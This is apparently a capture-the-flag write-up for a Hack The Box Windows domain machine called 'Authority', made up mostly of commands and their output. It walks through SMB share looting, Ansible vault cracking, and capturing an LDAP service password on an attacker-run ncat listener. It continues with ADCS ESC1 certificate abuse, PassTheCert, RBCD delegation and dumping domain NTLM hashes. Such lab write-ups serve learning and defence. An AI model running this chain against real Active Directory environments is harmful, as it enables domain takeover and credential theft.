Authority

Recon

nmap_scan.log

Open 10.129.229.56:53
Open 10.129.229.56:80
Open 10.129.229.56:88
Open 10.129.229.56:135
Open 10.129.229.56:139
Open 10.129.229.56:389
Open 10.129.229.56:445
Open 10.129.229.56:464
Open 10.129.229.56:593
Open 10.129.229.56:636
Open 10.129.229.56:9389
Open 10.129.229.56:8443
Open 10.129.229.56:49664
Open 10.129.229.56:49666
Open 10.129.229.56:49667
Open 10.129.229.56:49665
Open 10.129.229.56:49674
Open 10.129.229.56:49675
Open 10.129.229.56:49672
Open 10.129.229.56:49682
Open 10.129.229.56:49679
Open 10.129.229.56:49695
Open 10.129.229.56:49698
Open 10.129.229.56:47001
Open 10.129.229.56:51678
Open 10.129.229.56:51704
[~] Starting Script(s)
[>] Running script "nmap -vvv -p {{port}} {{ip}} -vvv -sV -sC -Pn" on ip 10.129.229.56

PORT      STATE SERVICE       REASON  VERSION
53/tcp    open  domain        syn-ack Simple DNS Plus
80/tcp    open  http          syn-ack Microsoft IIS httpd 10.0
|_http-title: IIS Windows Server
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
88/tcp    open  kerberos-sec  syn-ack Microsoft Windows Kerberos (server time: 2024-12-07 20:28:02Z)
135/tcp   open  msrpc         syn-ack Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack Microsoft Windows Active Directory LDAP (Domain: authority.htb, Site: Default-First-Site-Name)
| ssl-cert: Subject: 
| Subject Alternative Name: othername: UPN::AUTHORITY$@htb.corp, DNS:authority.htb.corp, DNS:htb.corp, DNS:HTB
| Issuer: commonName=htb-AUTHORITY-CA/domainComponent=htb
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2022-08-09T23:03:21
| Not valid after:  2024-08-09T23:13:21
|_ssl-date: 2024-12-07T20:29:08+00:00; +4h00m00s from scanner time.
445/tcp   open  microsoft-ds? syn-ack
464/tcp   open  kpasswd5?     syn-ack
593/tcp   open  ncacn_http    syn-ack Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      syn-ack Microsoft Windows Active Directory LDAP (Domain: authority.htb, Site: Default-First-Site-Name)
|_ssl-date: 2024-12-07T20:29:09+00:00; +4h00m00s from scanner time.
| ssl-cert: Subject: 
| Subject Alternative Name: othername: UPN::AUTHORITY$@htb.corp, DNS:authority.htb.corp, DNS:htb.corp, DNS:HTB
| Issuer: commonName=htb-AUTHORITY-CA/domainComponent=htb
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2022-08-09T23:03:21
| Not valid after:  2024-08-09T23:13:21
| MD5:   d494:7710:6f6b:8100:e4e1:9cf2:aa40:dae1
| SHA-1: dded:b994:b80c:83a9:db0b:e7d3:5853:ff8e:54c6:2d0b
8443/tcp  open  ssl/http      syn-ack Apache Tomcat (language: en)
|_http-title: Site doesn't have a title (text/html;charset=ISO-8859-1).
|_ssl-date: TLS randomness does not represent time
|_http-favicon: Unknown favicon MD5: F588322AAF157D82BB030AF1EFFD8CF9
| ssl-cert: Subject: commonName=172.16.2.118
| Issuer: commonName=172.16.2.118
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-12-05T19:06:27
| Not valid after:  2026-12-08T06:44:51
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
9389/tcp  open  mc-nmf        syn-ack .NET Message Framing
47001/tcp open  http          syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open  msrpc         syn-ack Microsoft Windows RPC
49665/tcp open  msrpc         syn-ack Microsoft Windows RPC
49666/tcp open  msrpc         syn-ack Microsoft Windows RPC
49667/tcp open  msrpc         syn-ack Microsoft Windows RPC
49672/tcp open  msrpc         syn-ack Microsoft Windows RPC
49674/tcp open  ncacn_http    syn-ack Microsoft Windows RPC over HTTP 1.0
49675/tcp open  msrpc         syn-ack Microsoft Windows RPC
49679/tcp open  msrpc         syn-ack Microsoft Windows RPC
49682/tcp open  msrpc         syn-ack Microsoft Windows RPC
49695/tcp open  msrpc         syn-ack Microsoft Windows RPC
49698/tcp open  msrpc         syn-ack Microsoft Windows RPC
51678/tcp open  msrpc         syn-ack Microsoft Windows RPC
51704/tcp open  msrpc         syn-ack Microsoft Windows RPC
Service Info: Host: AUTHORITY; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
|_clock-skew: mean: 3h59m59s, deviation: 0s, median: 3h59m59s
| smb2-time: 
|   date: 2024-12-07T20:29:03
|_  start_date: N/A
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 5733/tcp): CLEAN (Couldn't connect)
|   Check 2 (port 61876/tcp): CLEAN (Couldn't connect)
|   Check 3 (port 45641/udp): CLEAN (Failed to receive data)
|   Check 4 (port 29090/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked

SMB

We have access to SMB with non authorized user. There's Development share we have read access to so let's dump that.

└─$ netexec smb authority.htb -u 'anonymous' -p '' --shares --smb-timeout 1000
SMB         10.129.229.56   445    AUTHORITY        [*] Windows 10 / Server 2019 Build 17763 x64 (name:AUTHORITY) (domain:authority.htb) (signing:True) (SMBv1:False)
SMB         10.129.229.56   445    AUTHORITY        [+] authority.htb\anonymous:
SMB         10.129.229.56   445    AUTHORITY        [*] Enumerated shares
SMB         10.129.229.56   445    AUTHORITY        Share           Permissions     Remark
SMB         10.129.229.56   445    AUTHORITY        -----           -----------     ------
SMB         10.129.229.56   445    AUTHORITY        ADMIN$                          Remote Admin
SMB         10.129.229.56   445    AUTHORITY        C$                              Default share
SMB         10.129.229.56   445    AUTHORITY        Department Shares
SMB         10.129.229.56   445    AUTHORITY        Development     READ
SMB         10.129.229.56   445    AUTHORITY        IPC$            READ            Remote IPC
SMB         10.129.229.56   445    AUTHORITY        NETLOGON                        Logon server share
SMB         10.129.229.56   445    AUTHORITY        SYSVOL                          Logon server share

└─$ netexec smb authority.htb -u 'anonymous' -p '' --shares --smb-timeout 1000 -M spider_plus -o DOWNLOAD_FLAG=True
SPIDER_PLUS 10.129.229.56   445    AUTHORITY        [+] Saved share-file metadata to "/tmp/nxc_spider_plus/10.129.229.56.json".
└─$ lta /tmp/nxc_spider_plus/10.129.229.56/Development/Automation/Ansible/
drwxrwxr-x    - woyag  7 Dec 12:11  /tmp/nxc_spider_plus/10.129.229.56/Development/Automation/Ansible
drwxrwxr-x    - woyag  7 Dec 12:11 ├──  ADCS
.rw-rw-r--  259 woyag  7 Dec 12:10 │  ├──  .ansible-lint
.rw-rw-r--  205 woyag  7 Dec 12:10 │  ├──  .yamllint
drwxrwxr-x    - woyag  7 Dec 12:10 │  ├──  defaults
.rw-rw-r-- 1.6k woyag  7 Dec 12:10 │  │  └──  main.yml
.rw-rw-r--  11k woyag  7 Dec 12:10 │  ├──  LICENSE
drwxrwxr-x    - woyag  7 Dec 12:10 │  ├──  meta
.rw-rw-r--  549 woyag  7 Dec 12:10 │  │  ├──  main.yml
.rw-rw-r--   22 woyag  7 Dec 12:10 │  │  └──  preferences.yml
drwxrwxr-x    - woyag  7 Dec 12:10 │  ├──  molecule
drwxrwxr-x    - woyag  7 Dec 12:11 │  │  └──  default
.rw-rw-r--  106 woyag  7 Dec 12:10 │  │     ├──  converge.yml
.rw-rw-r--  526 woyag  7 Dec 12:11 │  │     ├──  molecule.yml
.rw-rw-r--  371 woyag  7 Dec 12:11 │  │     └──  prepare.yml
.rw-rw-r-- 7.3k woyag  7 Dec 12:11 │  ├──  README.md
.rw-rw-r--  466 woyag  7 Dec 12:11 │  ├──  requirements.txt
.rw-rw-r--  264 woyag  7 Dec 12:11 │  ├──  requirements.yml
.rw-rw-r--  924 woyag  7 Dec 12:11 │  ├──  SECURITY.md
drwxrwxr-x    - woyag  7 Dec 12:11 │  ├──  tasks
.rw-rw-r-- 2.9k woyag  7 Dec 12:11 │  │  ├──  assert.yml
.rw-rw-r-- 2.3k woyag  7 Dec 12:11 │  │  ├──  generate_ca_certs.yml
.rw-rw-r-- 1.2k woyag  7 Dec 12:11 │  │  ├──  init_ca.yml
.rw-rw-r-- 1.4k woyag  7 Dec 12:11 │  │  ├──  main.yml
.rw-rw-r-- 4.2k woyag  7 Dec 12:11 │  │  └──  requests.yml
drwxrwxr-x    - woyag  7 Dec 12:11 │  ├──  templates
.rw-rw-r-- 1.7k woyag  7 Dec 12:11 │  │  ├──  extensions.cnf.j2
.rw-rw-r--  11k woyag  7 Dec 12:11 │  │  └──  openssl.cnf.j2
.rw-rw-r--  419 woyag  7 Dec 12:11 │  ├──  tox.ini
drwxrwxr-x    - woyag  7 Dec 12:11 │  └──  vars
.rw-rw-r-- 2.1k woyag  7 Dec 12:11 │     └──  main.yml
drwxrwxr-x    - woyag  7 Dec 12:11 ├──  LDAP
drwxrwxr-x    - woyag  7 Dec 12:11 │  ├──  .bin
.rw-rw-r--  677 woyag  7 Dec 12:11 │  │  ├──  clean_vault
.rw-rw-r--  357 woyag  7 Dec 12:11 │  │  ├──  diff_vault
.rw-rw-r--  768 woyag  7 Dec 12:11 │  │  └──  smudge_vault
.rw-rw-r-- 1.4k woyag  7 Dec 12:11 │  ├──  .travis.yml
drwxrwxr-x    - woyag  7 Dec 12:11 │  ├──  defaults
.rw-rw-r-- 1.0k woyag  7 Dec 12:11 │  │  └──  main.yml
drwxrwxr-x    - woyag  7 Dec 12:11 │  ├──  files
.rw-rw-r--  170 woyag  7 Dec 12:11 │  │  └──  pam_mkhomedir
drwxrwxr-x    - woyag  7 Dec 12:11 │  ├──  handlers
.rw-rw-r--  277 woyag  7 Dec 12:11 │  │  └──  main.yml
drwxrwxr-x    - woyag  7 Dec 12:11 │  ├──  meta
.rw-rw-r--  416 woyag  7 Dec 12:11 │  │  └──  main.yml
.rw-rw-r-- 5.8k woyag  7 Dec 12:11 │  ├──  README.md
drwxrwxr-x    - woyag  7 Dec 12:11 │  ├──  tasks
.rw-rw-r-- 5.2k woyag  7 Dec 12:11 │  │  └──  main.yml
drwxrwxr-x    - woyag  7 Dec 12:11 │  ├──  templates
.rw-rw-r--  131 woyag  7 Dec 12:11 │  │  ├──  ldap_sudo_groups.j2
.rw-rw-r--  106 woyag  7 Dec 12:11 │  │  ├──  ldap_sudo_users.j2
.rw-rw-r-- 2.6k woyag  7 Dec 12:11 │  │  ├──  sssd.conf.j2
.rw-rw-r--   30 woyag  7 Dec 12:11 │  │  └──  sudo_group.j2
.rw-rw-r--  119 woyag  7 Dec 12:11 │  ├──  TODO.md
.rw-rw-r--  640 woyag  7 Dec 12:11 │  ├── ⍱ Vagrantfile
drwxrwxr-x    - woyag  7 Dec 12:11 │  └──  vars
.rw-rw-r--  174 woyag  7 Dec 12:11 │     ├──  debian.yml
.rw-rw-r--   75 woyag  7 Dec 12:11 │     ├──  main.yml
.rw-rw-r--  222 woyag  7 Dec 12:11 │     ├──  redhat.yml
.rw-rw-r--  203 woyag  7 Dec 12:11 │     └──  ubuntu-14.04.yml
drwxrwxr-x    - woyag  7 Dec 12:11 ├──  PWM
.rw-rw-r--  491 woyag  7 Dec 12:11 │  ├──  ansible.cfg
.rw-rw-r--  174 woyag  7 Dec 12:11 │  ├──  ansible_inventory
drwxrwxr-x    - woyag  7 Dec 12:11 │  ├──  defaults
.rw-rw-r-- 1.6k woyag  7 Dec 12:11 │  │  └──  main.yml
drwxrwxr-x    - woyag  7 Dec 12:11 │  ├──  handlers
.rw-rw-r--    4 woyag  7 Dec 12:11 │  │  └──  main.yml
drwxrwxr-x    - woyag  7 Dec 12:11 │  ├──  meta
.rw-rw-r--  199 woyag  7 Dec 12:11 │  │  └──  main.yml
.rw-rw-r-- 1.3k woyag  7 Dec 12:11 │  ├──  README.md
drwxrwxr-x    - woyag  7 Dec 12:11 │  ├──  tasks
.rw-rw-r-- 1.8k woyag  7 Dec 12:11 │  │  └──  main.yml
drwxrwxr-x    - woyag  7 Dec 12:11 │  └──  templates
.rw-rw-r--  422 woyag  7 Dec 12:11 │     ├──  context.xml.j2
.rw-rw-r--  388 woyag  7 Dec 12:11 │     └──  tomcat-users.xml.j2
drwxrwxr-x    - woyag  7 Dec 12:11 └──  SHARE
drwxrwxr-x    - woyag  7 Dec 12:11    └──  tasks
.rw-rw-r-- 1.9k woyag  7 Dec 12:11       └──  main.yml

Creds: T0mc@tAdm1n:T0mc@tR00t

Defaults contain some kind of ansible credentials.

└─$ ansible2john ldap_admin_password.txt > ldap_admin_password.hash
└─$ ansible2john pwm_admin_login.txt > pwm_admin_login.hash
└─$ ansible2john pwm_admin_password.txt > pwm_admin_password.hash
└─$ cat *.hash > hashes
---
➜ .\john-1.9.0-jumbo-1-win64\run\john.exe --wordlist=.\rockyou.txt .\hashes
!@#$%^&*         (pwm_admin_password.txt)
!@#$%^&*         (pwm_admin_login.txt)
!@#$%^&*         (ldap_admin_password.txt)

Creds: !@#$%^&*:!@#$%^&*

https://www.bengrewell.com/cracking-ansible-vault-secrets-with-hashcat/

└─$ sudo apt install ansible-core -y
└─$ cat ansible/ldap_admin_password.txt | ansible-vault decrypt
Vault password:
Decryption successful
DevT3st@123                                                                                                                                                                                                       
└─$ cat ansible/pwm_admin_login.txt | ansible-vault decrypt
Vault password:
Decryption successful
svc_pwm

└─$ cat ansible/pwm_admin_password.txt | ansible-vault decrypt
Vault password:
Decryption successful
pWm_@dm!N_!23

Creds: svc_pwm:pWm_@dm!N_!23

Password: DevT3st@123

HTTPs (8443)

PWM is an open source password self-service application for LDAP directories.

From dropdown arrow we see version is PWM v2.0.3 bc96802e, it's few versions behind at the moment https://github.com/pwm-project/pwm/releases

Credentials from SMB doesn't work.

Second ansible credentials is also incorrect.

Password pWm_@dm!N_!23 logs us in.

We can download the configuration file which contains some kind of password.

There's additional username, but can't login with found credentials.

<setting key="ldap.proxy.username" modifyTime="2022-08-11T01:46:23Z" profile="default" syntax="STRING" syntaxVersion="0">
	<label>LDAP ⇨ LDAP Directories ⇨ default ⇨ Connection ⇨ LDAP Proxy User</label>
	<value>CN=svc_ldap,OU=Service Accounts,OU=CORP,DC=authority,DC=htb</value>
</setting>

Hash is not going to crack any time soon so Im giving up on that.

There are too many settings and it's overwhelming to explore, more down you go the less you understand and most of it is left to defaults AFAIK. Connection contains LDAP Proxy Password, but it's protected. We are able to add LDAP URLs, so we could try adding ourselves and see what we get.

Add ldap://10.10.14.113:636 to urls and then test, wait for callback:

└─$ yes | ncat -lvnkp 636
Ncat: Connection from 10.129.229.56:62553.
0Y`T;CN=svc_ldap,OU=Service Accounts,OU=CORP,DC=authority,DC=htblDaP_1n_th3_cle4r!

New credentials.. but looks like password starts after DC TLD.

Creds: svc_ldap:lDaP_1n_th3_cle4r!

└─$ netexec smb authority.htb -u 'svc_ldap' -p 'htblDaP_1n_th3_cle4r!'
SMB         10.129.229.56   445    AUTHORITY        [*] Windows 10 / Server 2019 Build 17763 x64 (name:AUTHORITY) (domain:authority.htb) (signing:True) (SMBv1:False)
SMB         10.129.229.56   445    AUTHORITY        [-] authority.htb\svc_ldap:htblDaP_1n_th3_cle4r! STATUS_LOGON_FAILURE

└─$ netexec smb authority.htb -u 'svc_ldap' -p 'lDaP_1n_th3_cle4r!'
SMB         10.129.229.56   445    AUTHORITY        [*] Windows 10 / Server 2019 Build 17763 x64 (name:AUTHORITY) (domain:authority.htb) (signing:True) (SMBv1:False)
SMB         10.129.229.56   445    AUTHORITY        [+] authority.htb\svc_ldap:lDaP_1n_th3_cle4r!

WinRM

└─$ netexec winrm authority.htb -u 'svc_ldap' -p 'lDaP_1n_th3_cle4r!'
WINRM       10.129.229.56   5985   AUTHORITY        [*] Windows 10 / Server 2019 Build 17763 (name:AUTHORITY) (domain:authority.htb)
WINRM       10.129.229.56   5985   AUTHORITY        [+] authority.htb\svc_ldap:lDaP_1n_th3_cle4r! (Pwn3d!)

└─$ evil-winrm -i authority.htb -u svc_ldap -p 'lDaP_1n_th3_cle4r!'
Evil-WinRM shell v3.5
*Evil-WinRM* PS C:\Users\svc_ldap\Documents> whoami /all

User Name    SID
============ =============================================
htb\svc_ldap S-1-5-21-622327497-3269355298-2248959698-1601

Group Name                                  Type             SID          Attributes
=========================================== ================ ============ ==================================================
Everyone                                    Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users             Alias            S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                               Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access  Alias            S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
BUILTIN\Certificate Service DCOM Access     Alias            S-1-5-32-574 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                        Well-known group S-1-5-2      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users            Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization              Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication            Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label            S-1-16-8448

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

User.txt

*Evil-WinRM* PS C:\Users\svc_ldap\Documents> cat ../Desktop/user.txt
2be9deb850ae73c7e96fc2bcffe65046

Privilege Escalation

We could try the default enumeration with winpeas + bloodhound, but considering the name we are 110% dealing with misconfigured certificates.

└─$ certipy-ad find -vulnerable -u 'svc_ldap@authority.htb' -p 'lDaP_1n_th3_cle4r!' -stdout
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Finding certificate templates
[*] Found 37 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 13 enabled certificate templates
[*] Trying to get CA configuration for 'AUTHORITY-CA' via CSRA
[!] Got error while trying to get CA configuration for 'AUTHORITY-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.
[*] Trying to get CA configuration for 'AUTHORITY-CA' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Got CA configuration for 'AUTHORITY-CA'
[*] Enumeration output:
Certificate Authorities
  0
    CA Name                             : AUTHORITY-CA
    DNS Name                            : authority.authority.htb
    Certificate Subject                 : CN=AUTHORITY-CA, DC=authority, DC=htb
    Certificate Serial Number           : 2C4E1F3CA46BBDAF42A1DDE3EC33A6B4
    Certificate Validity Start          : 2023-04-24 01:46:26+00:00
    Certificate Validity End            : 2123-04-24 01:56:25+00:00
    Web Enrollment                      : Disabled
    User Specified SAN                  : Disabled
    Request Disposition                 : Issue
    Enforce Encryption for Requests     : Enabled
    Permissions
      Owner                             : AUTHORITY.HTB\Administrators
      Access Rights
        ManageCertificates              : AUTHORITY.HTB\Administrators
                                          AUTHORITY.HTB\Domain Admins
                                          AUTHORITY.HTB\Enterprise Admins
        ManageCa                        : AUTHORITY.HTB\Administrators
                                          AUTHORITY.HTB\Domain Admins
                                          AUTHORITY.HTB\Enterprise Admins
        Enroll                          : AUTHORITY.HTB\Authenticated Users
Certificate Templates
  0
    Template Name                       : CorpVPN
    Display Name                        : Corp VPN
    Certificate Authorities             : AUTHORITY-CA
    Enabled                             : True
    Client Authentication               : True
    Enrollment Agent                    : False
    Any Purpose                         : False
    Enrollee Supplies Subject           : True
    Certificate Name Flag               : EnrolleeSuppliesSubject
    Enrollment Flag                     : AutoEnrollmentCheckUserDsCertificate
                                          PublishToDs
                                          IncludeSymmetricAlgorithms
    Private Key Flag                    : ExportableKey
    Extended Key Usage                  : Encrypting File System
                                          Secure Email
                                          Client Authentication
                                          Document Signing
                                          IP security IKE intermediate
                                          IP security use
                                          KDC Authentication
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Validity Period                     : 20 years
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 2048
    Permissions
      Enrollment Permissions
        Enrollment Rights               : AUTHORITY.HTB\Domain Computers
                                          AUTHORITY.HTB\Domain Admins
                                          AUTHORITY.HTB\Enterprise Admins
      Object Control Permissions
        Owner                           : AUTHORITY.HTB\Administrator
        Write Owner Principals          : AUTHORITY.HTB\Domain Admins
                                          AUTHORITY.HTB\Enterprise Admins
                                          AUTHORITY.HTB\Administrator
        Write Dacl Principals           : AUTHORITY.HTB\Domain Admins
                                          AUTHORITY.HTB\Enterprise Admins
                                          AUTHORITY.HTB\Administrator
        Write Property Principals       : AUTHORITY.HTB\Domain Admins
                                          AUTHORITY.HTB\Enterprise Admins
                                          AUTHORITY.HTB\Administrator
    [!] Vulnerabilities
      ESC1                              : 'AUTHORITY.HTB\\Domain Computers' can enroll, enrollee supplies subject and template allows client authentication

https://github.com/ly4k/Certipy?tab=readme-ov-file#esc1 https://www.thehacker.recipes/ad/movement/adcs/certificate-templates#esc1-template-allows-san https://ppn.snovvcrash.rocks/pentest/infrastructure/ad/ad-cs-abuse/esc1

'AUTHORITY.HTB\Domain Computers' can enroll, enrollee supplies subject and template allows client authentication

To abuse this we need a computer on a network and we should be able to create one.

└─$ netexec ldap authority.htb -u 'svc_ldap' -p 'lDaP_1n_th3_cle4r!' -L
...
[*] maq                       Retrieves the MachineAccountQuota domain-level attribute

└─$ netexec ldap authority.htb -u 'svc_ldap' -p 'lDaP_1n_th3_cle4r!' -M maq
SMB         10.129.229.56   445    AUTHORITY        [*] Windows 10 / Server 2019 Build 17763 x64 (name:AUTHORITY) (domain:authority.htb) (signing:True) (SMBv1:False)
LDAPS       10.129.229.56   636    AUTHORITY        [+] authority.htb\svc_ldap:lDaP_1n_th3_cle4r!
MAQ         10.129.229.56   389    AUTHORITY        [*] Getting the MachineAccountQuota
MAQ         10.129.229.56   389    AUTHORITY        MachineAccountQuota: 10

https://www.thehacker.recipes/ad/movement/builtins/machineaccountquota#create-a-computer-account

# bloodyad -d "$DOMAIN" -u "$USER" -p "$PASSWORD" --host "$DC_HOST" add computer 'SomeName' 'SomePassword'
└─$ bloodyAD -d 'authority.htb' -u 'svc_ldap' -p 'lDaP_1n_th3_cle4r!' --host '10.129.229.56' add computer 'Letmein' 'Password123$'
[+] Letmein created

Verify that it was created:

└─$ netexec ldap authority.htb -u 'Letmein$' -p 'Password123$'
SMB         10.129.229.56   445    AUTHORITY        [*] Windows 10 / Server 2019 Build 17763 x64 (name:AUTHORITY) (domain:authority.htb) (signing:True) (SMBv1:False)
LDAPS       10.129.229.56   636    AUTHORITY        [+] authority.htb\Letmein$:Password123$

└─$ netexec ldap authority.htb -u 'Letmein$' -p 'Password123$x'
SMB         10.129.229.56   445    AUTHORITY        [*] Windows 10 / Server 2019 Build 17763 x64 (name:AUTHORITY) (domain:authority.htb) (signing:True) (SMBv1:False)
LDAP        10.129.229.56   389    AUTHORITY        [-] authority.htb\Letmein$:Password123$x

Perform the ESC1 attack

└─$ USER='Letmein$'
PASSWORD='Password123$'
DOMAIN='authority.htb'
DC_IP='10.129.229.56'
CA='AUTHORITY-CA'
TEMPLATE='CorpVPN'
faketime -f +4h certipy-ad req -u "$USER" -p "$PASSWORD" -dc-ip "$DC_IP" -target "$DOMAIN" -ca "$CA" -template "$TEMPLATE" -upn "administrator@$DOMAIN"

Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 4
[*] Got certificate with UPN 'administrator@authority.htb'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator.pfx'

└─$ faketime -f +4h certipy-ad auth -pfx administrator.pfx
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Using principal: administrator@authority.htb
[*] Trying to get TGT...
[-] Got error while trying to request TGT: Kerberos SessionError: KDC_ERR_PADATA_TYPE_NOSUPP(KDC has no support for padata type)

https://www.thehacker.recipes/ad/movement/schannel/passthecert

└─$ git clone https://github.com/AlmondOffSec/PassTheCert.git
└─$ USER='administrator'
DOMAIN='authority.htb'
DC_IP='10.129.229.56'
certipy-ad cert -pfx "$USER.pfx" -nokey -out "$USER.crt"
certipy-ad cert -pfx "$USER.pfx" -nocert -out "$USER.key"
py ./PassTheCert/Python/passthecert.py -action ldap-shell -crt "$USER.crt" -key "$USER.key" -domain "$DOMAIN" -dc-ip "$DC_IP"
certipy-ad auth -pfx -dc-ip "$DC_IP" -ldap-shell
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Writing certificate and  to 'administrator.crt'
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Writing private key to 'administrator.key'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

Type help for list of commands

# whoami
u:HTB\Administrator

Path 1

One option is to add yourself to domain and add yourself to and groups. or add existing pwned users to any groups.

# add_user letmein
Attempting to create user in: %s CN=Users,DC=authority,DC=htb
Adding new user with username: letmein and password: jJyH[By!sym9;(I result: OK
# add_user_to_group letmein 'Domain Admins'
# add_user_to_group letmein 'Administrators'
# add_user_to_group letmein 'Remote Management Users'
# change_password letmein 'Password123$'
Got User DN: CN=letmein,CN=Users,DC=authority,DC=htb
Attempting to set new password of: Password123$
Password changed successfully!

└─$ evil-winrm -i authority.htb -u letmein -p 'Password123$'
Evil-WinRM shell v3.5
*Evil-WinRM* PS C:\Users\letmein\Documents> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                            Description                                                        State
========================================= ================================================================== =======
SeIncreaseQuotaPrivilege                  Adjust memory quotas for a process                                 Enabled
SeMachineAccountPrivilege                 Add workstations to domain                                         Enabled
SeSecurityPrivilege                       Manage auditing and security log                                   Enabled
SeTakeOwnershipPrivilege                  Take ownership of files or other objects                           Enabled
SeLoadDriverPrivilege                     Load and unload device drivers                                     Enabled
SeSystemProfilePrivilege                  Profile system performance                                         Enabled
SeSystemtimePrivilege                     Change the system time                                             Enabled
SeProfileSingleProcessPrivilege           Profile single process                                             Enabled
SeIncreaseBasePriorityPrivilege           Increase scheduling priority                                       Enabled
SeCreatePagefilePrivilege                 Create a pagefile                                                  Enabled
SeBackupPrivilege                         Back up files and directories                                      Enabled
SeRestorePrivilege                        Restore files and directories                                      Enabled
SeShutdownPrivilege                       Shut down the system                                               Enabled
SeDebugPrivilege                          Debug programs                                                     Enabled
SeSystemEnvironmentPrivilege              Modify firmware environment values                                 Enabled
SeChangeNotifyPrivilege                   Bypass traverse checking                                           Enabled
SeRemoteShutdownPrivilege                 Force shutdown from a remote system                                Enabled
SeUndockPrivilege                         Remove computer from docking station                               Enabled
SeEnableDelegationPrivilege               Enable computer and user accounts to be trusted for delegation     Enabled
SeManageVolumePrivilege                   Perform volume maintenance tasks                                   Enabled
SeImpersonatePrivilege                    Impersonate a client after authentication                          Enabled
SeCreateGlobalPrivilege                   Create global objects                                              Enabled
SeIncreaseWorkingSetPrivilege             Increase a process working set                                     Enabled
SeTimeZonePrivilege                       Change the time zone                                               Enabled
SeCreateSymbolicLinkPrivilege             Create symbolic links                                              Enabled
SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Enabled

Note: We could have added ourself to Administrators and then used psexec from impacket

Path 2

We can also abuse the delegations

# set_rbcd 'authority$' 'Letmein$'
Found Target DN: CN=AUTHORITY,OU=Domain Controllers,DC=authority,DC=htb
Target SID: S-1-5-21-622327497-3269355298-2248959698-1000

Found Grantee DN: CN=Letmein,CN=Computers,DC=authority,DC=htb
Grantee SID: S-1-5-21-622327497-3269355298-2248959698-12104
Delegation rights modified successfully!
Letmein$ can now impersonate users on authority$ via S4U2Proxy

Now we can request the Silver Ticket

└─$ faketime -f +4h impacket-getST -spn 'cifs/AUTHORITY.AUTHORITY.HTB' -impersonate administrator 'AUTHORITY.HTB/Letmein$:Password123$'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in administrator@cifs_AUTHORITY.AUTHORITY.HTB@AUTHORITY.HTB.ccache

└─$ KRB5CCNAME=administrator@cifs_AUTHORITY.AUTHORITY.HTB@AUTHORITY.HTB.ccache klist
Ticket cache: FILE:administrator@cifs_AUTHORITY.AUTHORITY.HTB@AUTHORITY.HTB.ccache
Default principal: administrator@AUTHORITY.HTB

Valid starting       Expires              Service principal
12/07/2024 18:07:07  12/08/2024 04:07:07  cifs/AUTHORITY.AUTHORITY.HTB@AUTHORITY.HTB
        renew until 12/08/2024 18:07:06
└─$ KRB5CCNAME=administrator@cifs_AUTHORITY.AUTHORITY.HTB@AUTHORITY.HTB.ccache faketime -f +4h impacket-secretsdump -k -no-pass 'AUTHORITY.HTB/administrator@authority.authority.htb' -just-dc-ntlm
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:6961f422924da90a6928197429eea4ed:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:bd6bd7fcab60ba569e3ed57c7c322908:::
